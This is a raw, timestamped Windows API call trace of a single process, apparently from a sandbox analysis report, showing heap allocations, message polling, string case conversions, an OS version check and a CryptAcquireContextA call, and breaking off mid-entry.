PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0111.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0111.806] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0111.806] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0111.806] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0111.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0111.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0111.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0111.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0111.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0111.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0111.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.807] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0111.807] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.807] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.807] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.808] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0111.808] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0111.808] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0111.808] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0111.808] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0111.808] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0111.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0111.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0111.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0111.809] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0111.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0111.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0111.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.810] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0111.810] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0111.810] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0111.810] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0111.810] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0111.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0111.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0111.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0111.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7020, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0111.810] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf330) returned 1 [0111.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.811] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0111.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.811] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0111.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.811] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0111.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.811] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0111.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.812] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0111.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.812] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0111.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.812] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0111.812] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.812] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0111.812] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.812] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0111.812] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0111.812] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0111.812] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0111.812] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0111.813] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.813] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.813] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0111.813] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.813] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0111.813] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.813] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.813] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.813] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.813] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0111.813] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 